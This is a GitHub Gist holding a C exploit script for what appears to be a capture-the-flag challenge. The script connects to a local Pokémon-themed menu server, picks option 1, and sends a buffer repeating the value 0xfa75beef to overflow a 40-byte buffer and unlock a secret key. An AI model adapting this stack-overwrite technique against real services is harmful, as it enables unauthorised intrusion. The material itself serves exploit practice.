Created
January 19, 2017 05:33
-
-
Save wmealing/0b749c5adbd5bfc6d9e3d755807f09c2 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <stdio.h> | |
#include <strings.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <sys/types.h> | |
#include <sys/socket.h> | |
#include <netinet/in.h> | |
#include <sys/types.h> | |
#include <sys/wait.h> | |
#include <sys/socket.h> | |
#include <netinet/in.h> | |
#include <arpa/inet.h> | |
#include <string.h> | |
#include <stdio.h> | |
#include <string.h> | |
#include <sys/types.h> | |
#include <sys/socket.h> | |
#include <netdb.h> | |
#include <arpa/inet.h> | |
#include <netinet/in.h> | |
#define PORTNO "12346" | |
#define POKEMON_NUMBER "1\n" /* Prompt number */ | |
#define POKEMON_OVERWRITE 0xfa75beef /* The secret value that it must be to get | |
the key. */ | |
#define TARGET_BUF_LEN 40 | |
#define MAX_SEND_BUFF 100 | |
#define MAX_RECV_BUFF 100 | |
#define DEBUG true | |
int recv_debug(int fd, int len) { | |
char recv_buff[MAX_RECV_BUFF]; | |
memset(recv_buff, '\0', MAX_RECV_BUFF); | |
recv(fd, recv_buff, len, 0); | |
#ifdef DEBUG | |
printf("** RECV_DEBUG: "); | |
printf("%s", recv_buff); | |
#endif | |
} | |
int main(void) { | |
int sockfd; | |
struct addrinfo hints, *res; | |
int bytes_sent, bytes_recv = 0; | |
char buf[TARGET_BUF_LEN]; | |
int send_buff[MAX_SEND_BUFF]; | |
size_t answer_length = 0; | |
char padding[100]; | |
int i; | |
memset(&hints, 0, sizeof hints); | |
hints.ai_family = AF_UNSPEC; | |
hints.ai_socktype = SOCK_STREAM; | |
getaddrinfo("127.0.0.1", "12346", &hints, &res); | |
/* open a socket to the server */ | |
sockfd = socket(res->ai_family, res->ai_socktype, res->ai_protocol); | |
if (connect(sockfd, res->ai_addr, res->ai_addrlen) == -1) { | |
perror("Error in connect:"); | |
exit(-1); | |
} | |
/* Example crap sent from server | |
Do you want to be a? | |
1.) Pokemon Master | |
2.) Elite Hacker | |
3.) The Batman | |
*/ | |
/* Server sends its greet, do you wanna be a */ | |
recv_debug(sockfd, 21); | |
/* Pokemon */ | |
recv_debug(sockfd, 19); | |
/* Elite hacker */ | |
recv_debug(sockfd, 17); | |
/* The batman */ | |
recv_debug(sockfd, 15); | |
/* send it that we want to be a pokemon master (1) */ | |
bytes_sent = send(sockfd, POKEMON_NUMBER, 2, 0); | |
/* Server sends another prompt , 44 long, some trash*/ | |
/* So you want to be the best there ever was? */ | |
recv_debug(sockfd, 44); | |
/* Prepare teh sploit! */ | |
memset(send_buff, '\0', MAX_SEND_BUFF * sizeof(int)); | |
/* Fill it in with the secret */ | |
for (i = 0 ; i <= 33; i++) { | |
send_buff[i] = POKEMON_OVERWRITE; | |
} | |
send_buff[34] = '\n'; | |
#ifdef DEBUG | |
for (i=0; i < 34; ++i) { | |
printf("%02x\n",send_buff[i]); | |
} | |
#endif | |
/* send the secret phrase.. */ | |
bytes_sent = send(sockfd, send_buff, (size_t) 34, 0); | |
/* What should come next ? */ | |
recv_debug(sockfd, 1); | |
fflush(stdout); | |
/* Clean up */ | |
close(sockfd); | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment